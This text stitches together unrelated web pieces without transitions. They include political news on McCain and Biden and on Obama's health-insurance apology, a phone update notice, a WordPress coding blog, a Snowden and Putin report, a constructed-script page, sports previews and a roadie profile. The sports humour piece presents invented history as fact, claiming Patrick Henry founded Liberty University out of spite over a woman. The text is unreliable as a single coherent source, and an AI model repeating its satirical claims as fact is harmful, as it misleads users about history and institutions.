At the event on Tuesday, former Gov. Tom Ridge (R) of Pennsylvania introduced his old friends McCain and Biden, and cited examples of their public civility.
In 2008, as the GOP nominee for president, McCain encountered a woman at a town hall who disparaged then-Senator Obama as an “Arab.” McCain firmly but politely cut her off. “No, ma'am” he said. “He's a decent family man and citizen that I just happen to have disagreements with on fundamental issues, and that's what this campaign is all about.”
The crowd booed.
The Biden example came from his announcement last October that he wouldn't run for president. The VP called for an end to the nation's “divisive partisan politics,” and rejected the notion that “it's naive to talk to Republicans.”
“I don't think we should look at Republicans as our enemies,” Biden said. “They are our opposition. They're not our enemies.”
The event at the University Club had a few light moments. McCain talked about how, long ago, he was the Navy's Senate liaison, and literally carried the young Senator Biden's bags on overseas trips.
“That was almost 40 years ago, and by God, I still resent it,” McCain quipped.
The senator also joked about losing to the Obama-Biden ticket eight years ago: He and Biden “served together in the Senate until 2008, when he helped deny me the job promotion I had worked very hard to get.”
Later, on a more serious note, Biden pointed out that he agreed to be Obama's running mate on the condition that he not be asked to attack his friend McCain. Back in the '70s, when McCain was technically working for Biden, the senator from Delaware said he viewed the injured war hero, fresh from solitary confinement, as “both my mentor and my confidant.”
“I strongly encouraged him to run for office,” Biden said. “It wasn't hard at all to recognize the caliber of the man, the depth of his intellect, the power of his conviction.”
Over the years, the vice president said, the two have disagreed strenuously on issues “but never question the other guy's motive.”
Allegheny College created the civility prize five years ago, “because we believe that a celebration of civility is the best antidote to incivility,” said Mullen, the college president.
Past winners are journalists David Brooks and Mark Shields; Sens. Dianne Feinstein (D) of California and Lindsey Graham (R) of South Carolina; the women of the United States Senate, who worked together to help end the government shutdown of 2013; and former Montgomery, Ala., Police Chief Kevin Murphy, for taking off his badge and giving it to Rep. John Lewis (D) of Georgia in 2014 as an act of contrition for the police department's treatment of Mr. Lewis in 1961.
“In accepting the award, each recipient has been quick to caution they are not nominees for sainthood,” Mullen said.
Indeed, in today's highly charged political atmosphere, it's impossible to escape criticism. In Tuesday's New York Times, columnist Thomas Friedman went after McCain for not standing up to his party's presumptive presidential nominee, who has been lobbing ugly rhetoric at a federal judge who is of Mexican descent.
After the event, in an interview, Mr. Ridge conveyed his passion for improving public discourse.
“I'm tired of hearing people say, ‘Well, they used to have fistfights in the Senate.' I know, and they used to have horses before they had cars,” said Ridge, who served as the first Homeland Security secretary. “So because they did that a long time ago, it doesn't mean they should be doing it now. I just don't buy that.”
Ridge blamed social media and the Internet, in part, for the coarseness in modern-day communication, “because you're not accountable.” He recently penned a column in Time magazine lamenting the current state of affairs. After it came out, “some people called me everything but Tom,” Ridge laughed. “And that's precisely the point. I have a strongly held point of view, and you can disagree with me if I'm wrong, but don't call me names.”
Get the Monitor Stories you care about delivered to your inbox. By signing up, you agree to our Privacy Policy
Editor's note: The photo on this story was updated to show one of both Biden and McCain.
President Obama (Photo11: Stephan Savoia, AP) Story Highlights In NBC interview, Obama apologizes for those facing insurance cancellations
President says those people will wind up with better plans
Comments to NBC reflect a significant change in tone
WASHINGTON--President Obama said on Thursday that he is sorry that some Americans are losing their current health insurance plans as a result of the Affordable Care Act, despite his oft-repeated assurances that Americans could keep their insurance plans if they like them.
The comments, which Obama made in an interview with NBC News, come as he faces a steady stream of criticism as millions of Americans on the individual insurance market received notices that their plans do not meet the minimum benefit requirements set under the ACA and will be canceled.
"I am sorry that they are finding themselves in this situation based on assurances they got from me," Obama said. "We've got to work hard to make sure that they know we hear them and we are going to do everything we can to deal with folks who find themselves in a tough position as a consequence of this."
Earlier this week at a health care summit hosted by alumni of his two presidential campaigns, Obama added some verbiage to his declaration — "if you like your current insurance, you keep that insurance" — that was a standard part of his public pitch on his signature health care legislation dating to 2009.
"Now, if you had one of these plans before the Affordable Care Act came into law and you really liked that plan, what we said was you can keep it if it hasn't changed since the law passed," Obama said in the speech to supporters.
Obama's comments to NBC mark a significant change in tone following more than a week of his aides resisting suggestions that the president misled Americans.
Administration officials have stressed it should be no surprise that a slice of the 5% of U.S. consumers who are on the individual insurance market would be forced to switch plans as a result of insurance providers dealing with meeting the minimum benefit requirement established under the law.
But while Obama trumpeted the ability of Americans to keep their insurance if they already had it, less emphasized was the reality that some insurers providing bare-bones coverage prior to the full implementation of the law would be forced to phase out such policies.
Obama said in the interview that most of those who are receiving cancellation notices were paying for "sub par" plans and the intention was to get Americans improved coverage at the same or cheaper rates. And the president insisted that over the long term, the minimum benefit standards set by the ACA will prove beneficial to consumers.
"But in this transition, you know, there are going to be folks who get a cancellation letter, especially when a website's not working," said Obama, who suggested that he will explore administrative action to help assist some of those who received cancellation notices. "They're looking and saying, 'What am I going to do now?'"
The bottom line, Obama added: "We were not as clear as we needed to be about the changes that were taking place," Obama said.
Obama also said he is "confident" that the glitch-plagued HealthCare.gov, the online exchange serving 36 states, will be vastly improved by the end of the month.
"I'm confident that it will be even better by November 30th and that the majority of people are going to be able to get on there," Obama said. "They're going to be able to enroll. They're going to be able to apply. And they're going to get a good deal -- a better deal than they've got right now when it comes to buying health insurance."
Senate Minority Leader Mitch McConnell, R-Ky., dismissed the apology, and called on Obama to embrace a bipartisan legislative effort in the Senate that would allow those getting cancellation notices to retain their coverage.
"If the president is truly sorry for breaking his promises to the American people, he'll do more than just issue a half-hearted apology on TV," McConnell said in a statement.
Read or Share this story: http://usat.ly/1c3cj2K
A quick heads up to all you folks with the HTC Vivid. Word in our HTC Vivid forums is that the Android 4.0.3 update is starting to push out. And even better is that you're able to force the push by dialing *#*#682#*#*. It looks like it's a slightly newer version that the update that leaked a week or so ago (that's as good a reminder as any that "leaked" doesn't mean "official"), so it's got that going for it.
(Update: AT&T tells us that there's no update officially being pushed yet.)
You'll also be updated to Sense 3.6. It's not quite as sexy as the new Sense 4 in the HTC One line, but it's a nice happy medium.
So get your download on, and hit the link below for more from folks who have already updated.
Source: HTC Vivid forum
How many of you got into PHP coding because of WordPress? – Matt Mullenweg
Me and roughly half the room of 200+ attendees raised their hand to that question. That's pretty incredible mused Matt. He asked that question while answering the larger question asked by 9th grader Lucas Cherkewski which was “How can WordPress be used in an education context to learn coding?”
I have been involved with WordPress for over half its 10 year existence and while I have gone from simple attendee to volunteer to community organizer over that time. I have always been a bit of the crazy one in terms of trying to help the community code better and learn about more advanced programming topics. That's because I have been coding since I am 7-8 years old so while I learned PHP through WordPress. I had done plenty of programming before then.
Plugin development is like high school
When I was coding in high school, I couldn't even do something as cool as a WordPress plugin. The web was just starting. I was mostly coding in Basic doing silly things like a text-based RPG. So I think it's amazing that someone can solve small problems with a plugin and share it with the world!
For a lot of people, that's enough. They can solve small problems without knowing a lot of advanced programming concepts. They don't need to graduate to college level concepts. WordPress has a lot of great APIs that are easy to use and require no advance programming knowledge.
How do you graduate to college level coding?
I did a WordPress meetup on object-oriented PHP recently and I can't say that I am the best of teachers and a lot of the utility and reason to use object-oriented programming was lost on most because WordPress doesn't use a lot of objects yet due to its recent PHP4 heritage.
How do I get better at PHP coding?
I don't get asked that question a lot, but, a few months ago, Michal Bluma asked me how I got into more advanced PHP coding. I told him definitely not with WordPress. I told him I had done a lot of learning looking at the code base Doctrine1, but version1 of Doctrine is mostly discontinued and Doctrine2 is a different beast entirely.
I told him take a look at Symfony, but that's akin to someone going from high school to college graduate. The knowledge gap is HUGE. The same would be said about Doctrine2, Zend Framework, etc.
Fundamentally, there's no way easy way for a WordPress developer close the gap.
WordPress core is an ideal candidate for this
WordPress core would be a great place for people to get a taste for advanced programming knowledge. What's great is that all the APIs already hide most of the internals so, if someone is looking at the core code, it's because they want to look at it. There's an opportunity here to allow them to become better coders! Unfortunately, that opportunity is currently wasted.
Core needs stronger coding standard
I am not talking about syntax here, but actual code quality. Core devs need to raise the bar a bit more. I am not talking about super advanced things like Reflection objects or metadata objects, but just better knowledge and use of object-oriented principles. Learning how to do object-oriented programming is really the next step if you want to learn more.
As an example, last night I submitted a ticket to core about the use of final with the WP_Post class. In my opinion, that should have never made it to core in the first place and shows a fundamental misunderstanding of object-oriented coding especially in an open source environment.
What needs to change
Honestly, it would be good if WordPress core at least used some PHP object-oriented best practices. Here are things that would be great for people looking to learn a bit more about being better PHP programmers:
Using interfaces where it makes sense to do so like with WP_Widget and WP_Post for example.
Severely limit the use of magic methods especially __get and __set
Exception handling instead of the white screen of death
Proper variable visibility
More abstract classes
This is just to name a few. You can find some of these in the code base already, but new code is still being committed where these basic rules are disregarded which is really the point I am trying to get across.
As a core dev, you should be holding yourself up to higher standards because you are indirectly a teacher for thousands of fledgling PHP developpers.
Feel free to leave a comment below or discuss on Hacker News.
NSA leaker Edward Snowden instantly regretted asking Russian President Vladimir Putin a softball question on live television about the Kremlin's mass surveillance effort, two sources close to the leaker tell The Daily Beast.
“It certainly didn't go as he would've hoped,” one of these sources said. “I don't think there's any shame in saying that he made an error in judgment.”
“He basically viewed the question as his first foray into criticizing Russia. He was genuinely surprised that in reasonable corridors it was seen as the opposite,” added Ben Wizner, the American Civil Liberties Union attorney who serves as one of Snowden's closest advisers.
According to Wizner and others, Snowden hadn't realized how much last week's Q&A—with Putin blithely assuring Snowden that Moscow had no such eavesdropping programs—would appear to be a Kremlin propaganda victory to Western eyes. And so the leaker quickly decided to write an op-ed for the Guardian to explain his actions and to all but label Putin a liar for his televised response.
Ever since Snowden landed in Moscow under the watchful eye of the Russian surveillance state, he's been represented in Russia by a man deeply connected to the Kremlin in addition to his American counsel. It's one of many reasons why critics have accused the leaker of being a Putin patsy. That criticism has been accompanied by a whisper campaign from both the American and Russian governments alleging that Snowden was under the thumb of Putin's intelligence services, a claim Snowden and his camp have strongly denied.
The talk rubbed Snowden the wrong way, his associates say. For months, he had been “looking for a situation to prove his critics wrong,” said one of his confidants—a chance to “convey to the public that he feels the same way about mass surveillance in Russia as he did about mass surveillance in the U.S.”
But it wasn't easy in Russia, where the press is controlled so tightly by the regime. Last month, the Kremlin silenced many of the last remaining critical news outlets in the country. “In Russia, you just can't—obviously, there's not as much dissent as in the U.S.,” a source close to Snowden said. The Putin television program seemed to be “a high-profile opportunity” to correct the record.
Snowden's camp wouldn't get into the specifics of how his question made it onto the live broadcast on Russian state television. But it is worth noting that Anatoly Kucherena, Snowden's Russian lawyer, has deep Kremlin ties and sits on the board that oversees the FSB, the successor to the KGB. Getting on state television wouldn't have been much trouble.
With several of his key advisers offline, Snowden crafted his question for Putin. The leaker was aware that a frontal assault on the Russian leader likely wouldn't make it past the Kremlin's publicists. (“How do you succeed in lifting the taboo on state surveillance without being censored by state screeners?” Wizner asked.) So Snowden spent the first half of his pre-taped question talking about the ills of American surveillance. Then he said:
“Does Russia intercept, store, or analyze in any way the communications of millions of individuals? And do you believe that simply increasing the effectiveness of intelligence or law enforcement agencies can justify placing societies, rather than subjects, under surveillance? Thank you.”
“It was the strongest possible question that could possibly get through [Putin's propagandists],” one source close to Snowden said. Which is to say: not very strong at all.
Snowden may have thought he could catch Putin in a lie; Russia, in fact, has one of the world's most pervasive systems for state surveillance. Snowden may have crafted the question to mirror Sen. Ron Wyden's questioning under oath of Director of National Intelligence James Clapper, as Snowden later claimed in his Guardian op-ed. (Clapper wound up spouting, as he later put it, the “least untruthful” statement he could about the NSA's domestic spying.) But that assumes Putin—or Russia—cares about such untruths in the same way America or its leaders do. “Trapping Putin in a lie is not the same as trapping Obama or Clapper,” one of Snowden's advisers sighed.
Putin's answer was predictable. “Of course, we know that criminals and terrorists use technology for their criminal acts and of course the special services have to use technical means to respond to their crimes,” he said. “But we don't have a mass-scale, uncontrollable efforts like that…Our special services…are strictly controlled by the society and the law, and are regulated by the law.”
The response in the West was immediate, and overwhelmingly negative. “Snowden's appearance on Russian television yesterday in a highly scripted propaganda stunt for Vladimir Putin does not settle the question of whether he was originally an FSB tool. But it sure does settle the question—at least in my mind—of his role now,” wrote Benjamin Wittes, a defender of the NSA and a senior fellow at the Brookings Institution. (Full disclosure: I'm a non-resident fellow there, as well.)
“The best you can say about this is he may have thought he was trying to broaden the conversation to talk about Russian surveillance. If that is the case, this is probably a naïve way to go about it,” Julian Sanchez, a research fellow at the libertarian Cato Institute and a major NSA critic, told The Daily Beast.
Some in Snowden's corner mocked the criticism. (“Snowden should storm the Kremlin,” tweeted Glenn Greenwald, the recipient of many a Snowden leak.) But even Jesselyn Radack, one of Snowden's American lawyers, instantly acknowledged that the interchange was a misstep. “Unfortunately, it can play into the incorrect meme that he is somehow being controlled by Russia,” she said to The Daily Beast.
Wizner said he understood the revulsion: The interchange looked like cheap agitprop. “I know this is hard to believe. I know if I was just watching from afar, I'd think, ‘Wow, they forced him [Snowden] to do this,'” the ACLU attorney added. “But it's not true. He just fucking did it.”
Snowden was mortified by the reaction, said Wizner and others. Within hours, the leaker decided to write an op-ed to clarify his position. Snowden decided to run it with the Guardian because of his long-standing relationship with the paper—which ran his first leak—and because he knew it would publish the piece instantly.
“Putin's response appears to be the strongest denial of involvement in mass surveillance ever given by a Russian leader—a denial that is, generously speaking, likely to be revisited by journalists,” Snowden wrote. “I understand the concerns of critics, but there is a more obvious explanation for my question than a secret desire to defend the kind of policies I sacrificed a comfortable life to challenge: if we are to test the truth of officials' claims, we must first give them an opportunity to make those claims.”
After nearly 10 months as a guest of the Kremlin, it was the closest Snowden had come to directly criticizing his hosts in Moscow. Some in his circle are concerned about what might happen next. “I'm worried about his safety now,” one adviser said. Such a frontal attack seems unlikely; even before last week's interchange, Snowden had proved to be an invaluable, if perhaps unintentional, weapon in the Kremlin's propaganda war with the West. But it is worth noting that Snowden's temporary asylum expires in August, and he has few places he can go without risking arrest.
Wizner said he hopes that the Guardian op-ed silences those “Snowden-Putin truthers” who are convinced that the Russian security services are behind the leaker's every move. But Wizner isn't holding his breath. “If Snowden demanded Putin's resignation, they'd see it as another piece of evidence that he's Putin's pawn,” the lawyer added.
The bigger question, however, is whether Snowden can restore his reputation among the much larger group of people who viewed his initial leaks as admirable, and his appearance with Putin as risible. The answer to that question is, at this point, unknown.
Gagrite alphabet
The Gagrite script was invented by Jeffrey Recinos in 2013 to write Gagrite, a Kostro-Saric language spoken by about 300 million people in the country of Argaren, and used as a lingua franca around the fictional world of Kadara. It is also used to write Savastrian, another Kostro-Saric language spoken by about 22 million people in the country of Savastria. Gagrite was developed as a way of creating a history of the Kostro-Saric writing systems used in Kadara. As a result, the script deliberately takes cues from the Naric script to present Gagrite as a parent script.
Internal History
Gagrite stands as the oldest surviving language in Kadara, lasting over 4,100 years. Its morphology and lexicon remain virtually untouched with most of the changes today suited to technological advancements. The Gagrite script has gone through several changes in its history, being more curved to better fit modern printed medium as most ancient Gagrite slabs were very sharp and angular. Gagrite serves as the parent of many scripts for other Kostro-Saric languages like Naric, Tolianem, Neosaric, and Praezhadan. Gagrite used to contain semanto-phonetic characters alongside the standard alphabet, but ultimately fell out of use about 800 years ago. During that time, the script also evolved to suit the Savastrian language as well.
Notable features
Type of writing system: Alphabet
Direction of writing: left to right in vertical columns
Used to write: Gagrite and Savastrian
Gagrite uses additional numerals to represent 10, 50, 100, and 1000
Gagrite uses special combinations for certain CV syllables
Gagrite contains many special punctuation marks used for specific purposes
Gagrite alphabet (gagrus hêkayon)
Gagrite is written in a syllable-block style (known in Gagrite as jočyautogre), with each character containing an initial (optional), onset, nucleus, and coda letter:
Initial consonants (tuxontogre)
Onset consonants (simdêxutogre)
Onset consonants have two forms: The first form used in CV syllables, the other used in CVC syllables:
Nucleus vowels (iriska)
Coda consonants (hiyêtogre)
Gagrite has special characters when certain letters are combined:
Pronunciation rules for Gagrite
Stress occurs in the antepenultimate syllable of a Gagrite word; nasalized vowels are always stressed.
Syllables beginning with [h] are pronounced [ʔ] if its preceding syllable ends in a coda consonant (e.g. doče, bread vs dočhare, eat bread)
Consonants can be geminated by adding the appropriate initial consonant above the syllable.
The sound [g] is pronounced when stressed, and [ɰ] everywhere else if it does not succeed a coda consonant (e.g. gano [ˈga.no], simple vs sênbêge [ˈsen.be.ɰə], narrow)
The sound [d] is pronounced when stressed, [ð] everywhere else; other dialects may have [d] or [ð] pronounced everywhere regardless of stress.
The sound [q] is pronounced [g] as a coda consonant if its onset consonant a voiceless plosive [p,t̪,k,q] and the voiceless velar fricative [x].
[l]+[j] and [n]+[j] are pronounced [ʎ] and [ɲ] respectively.
[ɾ]+[l] is pronounced [ɬ] in Standard Gagrite, [ɮ] in minor dialects
E is pronounced [ə] in Standard Gagrite, [ʌ] in other major dialects
Î and ë are extremely rare vowels in Gagrite, occurring in very ancient Gagrite words. Proposals are being made to replace these with i and e, respectively.
Numerals (har)
Gagrite punctuation marks (okarigerye)
Sample text
Transliteration
Qam ineri donema gebuč et xopre hat yêč et kramino sêpuneqdon. Sêbare holuk et orithê xai tratuneqdon, et dêkustin bar nai hat kêspirau tom igoreru.
(Pnit dêke osmêda turčêpeq tom ineri xopre tom)
Translation
All human beings are born free and equal in dignity and rights. They are endowed with reason and conscience and should act towards one another in a spirit of brotherhood.
(Article 1 of the Universal Declaration of Human Rights)
If you have any questions about Gagrite, you can contact Jeffrey at languo7@live.com
Con-scripts by Jeffrey Recinos
Gagrite, Naric, Simtex, Todocisian, Tolianem
Other constructed scripts
If you need to type in many different languages, the Q International Keyboard can help. If enables you to type almost any language that uses the Latin, Cyrillic or Greek alphabets, and is free.
If you like this site and find it useful, you can support it by making a donation, or by contributing in other ways. Omniglot is how I make my living.
Hello. Welcome back! Holy hell, I can't believe you clicked on this, you must be so desperate at the end of this horrendously long offseason that you'll read ANYTHING. Great news for me! And great news for you; I was real busy this summer so I didn't have time to do ANY research on Liberty. But that's okay! I've got a great imagination, a can-do spirit, no word limit to stay within (or concept of what one is) and lots of exclamation points!
WOOHOOOOOOO! Let's DO THIS! Damn, that gif never gets old.
1. What's been happening?
A. Sadly, the 2015 season marked the end of not one, but two eras. Frank Beamer has left the Beamer Barn for greener fairways, and the last Fuller brother has left for the NFL in order to finally get paid what he deserves for the privilege of watching him do magical football things. I'm going to need a minute.
Okay, tough guy, tell me YOU weren't in a darkened room crying when he declared for the draft.
So what does this mean for the future of Hokie football? Can Fuente carry on the Murray State tradition in Blacksburg? Is there another pair of perfectly gene-matched, virile and fertile parents like Vincent Sr. and Nina out there who have blessed the world with a quartet of amazing sons ready to carry on the brotherly legacy in Lane Stadium?
Elsewhere this summer, the mighty Welsh Dragons made it all the way to the semi-finals of the European Championship in soccer. A country about the size of New Jersey with the population of Iowa came within a whisker of the final at their first major tournament since the Eisenhower Administration. They made it further than traditional powers like Spain, Italy, and England1, and avenged the U.S. for the 2014 World Cup by putting Belgium to the sword 3-1. This happened shortly after my favorite Premier League team managed to become NOT a Premier League team anymore. Yes, Aston Villa was relegated to the Championship, meaning they are now harder to find on TV than the ACC Network, but that much closer to their level of competition, which has recently been just above hungover pub league.
2. Great, I'm so happy for an update on your weird European obsessions.
A. Cymru am byth! Wanna hear about the Olympics next?
3. No. Stop. Please. Football. Now. Who do we start off with this year?
A. The feared footballers of Liberty University!
This was on the second row of a Google image search for Lynchburg Liberty University2. The guy on the far right is my spirit animal.
4. Liberty?
Yes, a potential in-state rival 90 minutes away! There hasn't been one of those since James Mad-
5. DON'T SAY IT.
A. Uh...I mean...VMI! Whew, that Keydet rivalry was one to remember.
6. If they are so close, why hasn't Tech played them before?
A. Well, that all goes back to where Liberty came from.
7. Here we go.
A. Way back when, you may remember that we were once colonies of the evil tyrants of Great Britain who pissed us off by making us drink tea and buy stamps to mail letters so we'd have to pay their stupid taxes. So a lot of dudes started writing pamphlets and making speeches about how much that sucked and they just wanted some coffee and no, they don't CARE what happened to their mom back in Philly when Aunt Gertrude came for the summer with her seventeen half-feral cats, STOP MAKING HER WRITE US LETTERS.
One of the more famous speeches was by a Virginian named Patrick Henry, who is frequently misquoted as yelling "Give me liberty or give me death!" What he ACTUALLY said was "Give me liberty or give me Beth", referring to Beth Watson, a girl he met at boarding school in Scotland who he'd had a major crush on for decades. Henry wanted the British crown to give her up, or else he was taking his tobacco and his cotton and was LEAVING THE EMPIRE. Well, you can just guess what happened next.
An artist of the time period's rendering of Beth Watson. Walking on water.
The crown, loathe to freely give us a strategically hot ass...et, declined Henry's request and war ensued. Luckily, fellow Virginian George Washington whomped their ass...embled armies and sent them packing, even allying with the French, the military equivalent of tying one arm behind your back, to give the Brits a sporting chance.
Turns out, no one actually asked Beth if she even WANTED to go to America, which, it turned out, she did not. Citing the distinct lack of educational opportunities for her potential children, she demurred, writing to a friend that the only institutions of higher learning in Virginia (at the time) were "either founded or attended by that rapscallion Thomas Jefferson, and any university that would besmirch their good name by a willing association with his has no good name at all." Harsh words, indeed.
8. And yet, true.
A. So Henry did what any forlorn, lovestruck fool would do in the 1700s, he founded a college. Not so much in a final attempt to woo Ms. Watson, but as more of a middle finger type gesture. Mr. Henry was not the most forgiving of men, and in a vile rage, he explicitly named his college after the OTHER option in his threat, Liberty. And here we are.
9. Too late to ask for the short version?
A. Have you never been here before? I don't do short versions. So Beth stayed back in Englandshire and continued the family tradition of producing lovely women with intoxicating accents.
10. Any other interesting facts you can share?
A. Sure. When the athletic department was started up in the 1970s, Mr. Henry's descendants still carried the university's founding story in their hearts. To make sure that any of Beth's great great great great grandchildren knew that her scorn had never been forgotten, they decided to honor her with the naming of the mascot. And in a double entendre, they pulled it from the Taming of the Shrew, a none too subtle jab:
All of my Shakespeare knowledge comes from Julia Stiles or Claire Danes
11. Wow. A Heath Ledger pull that wasn't the Joker.
A. The "hunky Australian teen" role really demonstrated his range. Anyway, turns out that "Liberty Hatred That Burns With the Fire of a Thousand Suns" wouldn't fit on the athletic department's letterhead, so they settled on "Liberty Flames" instead. The Henry's certainly enjoy getting all dramatic and Shakespearean on someone. The personification of the Flames mascot now fully encapsulates Henry's pain:
Nothing conveys the concept of liberty and undying hatred more than an angry eagle with...what the hell is that, a beard? Is that a bearded eagle?
12. Any cool football related traditions?
A. Well, they've actually got a whole promotional video on YouTube to help teach people about the awesome, unique Liberty traditions. These include a rather innovative chant when they get a first down of "Move Those Chains", a helpful reminder to the officials that they should adjust the first down markers and associated chain (the inspiration for the chant) to account for the new ball placement. They also initiated a tradition of the "12th Man", something that the Texas A&M Aggies have since appropriated. The 12th Man gets its name from the fact that there are only 11 players allowed on the field at one time, but if you are super sneaky, you can disguise a 12th one and thus give your team a man advantage.
13. Do they have rivalries?
A. Yes! They have a rivalry with the Coastal Carolina Chanticleers, who are named after a rooster from Canterbury Tales. With Coastal Carolina going full Chaucer, it seems to be the only rivalry in college football to be based on each school's preferred choice of medieval English literary figure. Turns out that Coastal Carolina is ditching the Big South (Liberty's conference) in a bid to go to I-A football, which could pose a problem for the rivalry except that apparently Liberty is considering doing that as well. This would give Virginia three I-A teams, along with the Hokies and ODU.
14. Any Fullers?
A. No. Which means Saturday's contest will be a Fuller-free affair.
Take the pain away, Michael
15. What about the rest of their roster?
A. Liberty has many players, including a pair of brothers, Josh and Nick Newman, from Manhattan, NY, a rather uncommon source of football talent, especially considering their parentage.
Hello, Newman
They've got Tanner Hartman, who'll be playing a homecoming game of sorts, since he hails from just over in Christiansburg and his father was a three-time letter winner at Virginia Tech. He transferred to Liberty after a brief stint at Penn State, because...wait, why didn't he come here? I guess the Hokies were just probably way too good at offensive line to even consider a guy who's dad used to play here. Who needs offensive line depth, anyway?
Other roster highlights that I wish I had made up are a guy named Canon3, a Norwegian named Ernst, a Mitsubishi Dia'Vante, a Jaylyn, whose parents win the award for most unnecessary uses of the letter Y, an Alpha and my personal favorite for reasons I cannot explain, Rudiger Yearick4.
16. Do they have a coach?
A. Yes, Turner Gill, a man you may recognize from his brief success at Buffalo, which he parlayed into a job at Kansas where he flamed out5. Sadly, following the unusual success of Mark Mangino, Turner could not carry on the tradition of corpulence and was fired after winning only five games in two years. Luckily for Turner, he had an AWESOME agent and Kansas had to cough up a $6M payoff to get rid of him, which Turner wisely chose to bring to Lynchburg, VA instead of, you know, the Caribbean where he could live the rest of his life out in luxury on the beach drinking margaritas. Turner has had moderate success at Liberty, making the playoffs once and winning the conference three times in four years while never losing less than four games.
17. Should I go to Lynchburg?
A. Yes, if you are into a year-round "dry slope" skiing complex, they have one! And if you are eating while you are there, why don't you give the Texas Inn a shot, which according to the most recent menu I could find, still lists candy bars on its menu, which I don't think I've seen since 1987. A rave Google review from patron M Hill:
Go for the western and a bowl. This is one of those places you have to stop by at least once. The food is even good when you are sober.
The last sentence reminds me of Gumby's Pizza, except for the part about being good when you're sober. The western mentioned above, or more commonly the Cheesy Western, is a cheeseburger with a fried egg and homemade relish, which...that sounds really good, actually, with a side of Snickers.
18. How about barbecue?
A. According to Google, the best barbecue in Lynchburg is Pok-E-Joe's, which is apparently a more Texas style joint, per Jim Q on Yelp:
These sauces are more of a traditional western style. This is not that vinegar base junk like a Silver Pig and the like found in South Carolina.
Jim. Jimmy. Jimbo. Where do I even start. Let's just focus on your ignorance, setting aside your insults for my beloved vinegar based sauce, which doesn't actually come from South Carolina, where they use a mustard based sauce. Your throw away insult is like casually deriding the "Zima and Brie" crowd from the University of Maryland. Or saying how terrible that mesquite brisket is in North Dakota barbecue. Well...that's probably true, actually. Moving on, Andy Volenick helpfully adds:
Sadly there were no pokemone there.
Wait...I get it! Good one, Andy. You went through all that effort just to make a stupid joke about a name? How lame can you possibly be?
19. Are you retiring FAINTs since there are no more Fullers?
A. Wow, just keep twisting that knife.
Hard to take deep introspection from guys whose first big hit was about masturbation
No, but we are repurposing the acronym. Lest we forget, Foster also starts with F, meaning we can continue using FAINT to our heart's content. We'll just do some Orwellian history revision to make you think that it was ALWAYS Foster, silly. Looking forward, given the number interceptions Jerod Evans threw last year (three picks in 287 pass attempts), combined with the expected improvement from DBU with Brandon Facyson back and all the freshmen now sophomores AND the expected uptick in quarterback pressure, AND the double-digit leads the defense will be protecting all year forcing the opposition into obvious passing situations DBU can take advantage of, I'm looking for the FAINT count to be in the -17 range this year. Just a guess.
20. What should we watch for on this Saturday?
A. I'm watching for::
Is 105-0 too much to ask?
To see if the vaunted Liberty 12th man shows up in Lane Stadium!
Is Frank going to take time out of his mani/pedi schedule and show up, preferably with a milkshake?
If Terrell and Tremaine Edmunds and/or Connor and Kevin Kish carry on the brotherly tradition of awesomeness in Blacksburg? Speaking of, did you know identical twin brothers from Oceanside, CA play on the offensive line?
Okay, enjoy the warm up match for the Battle at Bristol and we'll see you next week with an eye searing look at neon orange fashion.
1For many Welsh, this part may actually be even sweeter than making the semifinals. Not REALLY, but...the English are the LOLUVA to Wales, complete with the pretentiousness and some people actually still wear those stupid wigs as part of their job.
2This was actually a shot from a polar plunge for charity, so...respect.
3The literary kind, not the kind that goes boom.
4Maybe because it makes me think of Rutger Hauer playing Hamlet, which I would definitely pay money to see.
5See what I did there?
The Miami Dolphins will be facing off against the Houston Texans this Saturday at 8 P.M in Miami's third preseason game.
Miami currently holds a record of 1-1 during the exhibition season and is looking to continue improving upon a bad showing to open the season against Dallas.
Here are five things to keep an eye on come Saturday:
– WR Rishard Matthews – Matthews has finally returned to practice and will be looking to out-perform his fellow teammates vying for the 4th and 5th receiver positions. Matthews should be good to go come Saturday and should, in my opinion, play a huge role in the offense as the coaching staff will likely want to see where he is at physically and mentally. If Matthews does indeed shine against Houston, look for the 5th spot to come down to a Bumphis – McNutt – Fuller battle.
– Which running back will shine this week? – During Miami's first two preseason games both Jonas Gray and Mike Gillislee have shined. Both players looked great against both Dallas and Jacksonville. Gray is a bowling-ball type back who uses his power and strength to overpower defenders. Gillislee, on the other hand, is more of a complete back who not only has power but also has a nice burst of speed. If both players perform well again this week it will make GM Jeff Ireland's job much harder come roster cuts.
– Will kicker Caleb Sturgis take the place kicking job and run with it? – Miami recently released K Dan Carpenter after five stellar seasons with the club. Sturgis was brought in as “competition” for Carpenter, but it was quite evident to most fans that Sturgis would eventually seize the job from Carpenter and his enormous salary at some point this season. Sturgis has looked good thus far through camp and one preseason game – nailed a beautiful 58-yard field goal attempt and booted every kick off out of the end-zone. Keep an eye on Sturgis this weekend.
– Will QB Ryan Tannehill finally connect with WR Mike Wallace? – When Miami faced Jacksonville, Miami's biggest offseason acquisition, Mike Wallace, finally took the field. While it was exciting to see Wallace in Miami colors, it was disappointing that Wallace finished the night without a catch and without a target. This past week, Tannehill has been hooking up with Wallace on a regular basis. Hopefully he finds Wallace AT LEAST once during the game to give Miami fans something to talk about.
– How will the offensive line look this week? – Yes, I know the offensive line as a whole last week looked awful. But the starters actually looked pretty good after the first drive and a half. After G Josh Samuda was pulled – for an injury or for doing terrible depending on who you talk to – and G Nate Garner entered the game, the offense put together a beautiful drive resulting in a 22-yard touchdown to TE Dustin Keller. While that sounds all purdy and what not, Garner suffered an injury this week and will be out for quite some time. Don't be too alarmed though, the offensive line received a boost by G John Jerry returning to practice. Jerry probably will not play Saturday but it's definitely a good sign to see the big fella back out there. Once Jerry gets himself healthy and back into game shape, this offensive line should be fine.
“Mr. President,” said former roadie and production manager for The Police Charlie Hernandez in April 2011, taking a pen out of his pocket, “I can get this pen anywhere on Earth in 72 hours.” He was talking to Bill Clinton after an awards dinner for Clinton's Global Initiative featuring Sting and Trudie Styler. “Wow,” Clinton answered in his Southern drawl, “Can I borrow your pen?”
Hernandez, who has received the Parnelli Lifetime Achievement Award, the rock concert industry's highest honor, is a Long Island native who gave up medical school to go on the road with bands. He is a proud father with a warm smile and striking silver-white hair. Although he can handle technical problems, he really shines as a coordinator and problem solver. During the infamous 1992 Guns N' Roses South America tour, for example, he dealt with gear getting caught up in a military coup in Venezuela, a Bogota rainstorm collapsing a stage roof, and threats from organized crime.
Yet when he offered his services to help recovery efforts in Haiti after the 2010 earthquake, what he heard was, “You're just a bunch of roadies. What can you do?” Sitting at home watching TV, he saw Bill Clinton and George W. Bush walking by a plane owned by Rock-It Cargo but not boarding it. Hernandez had his answer.
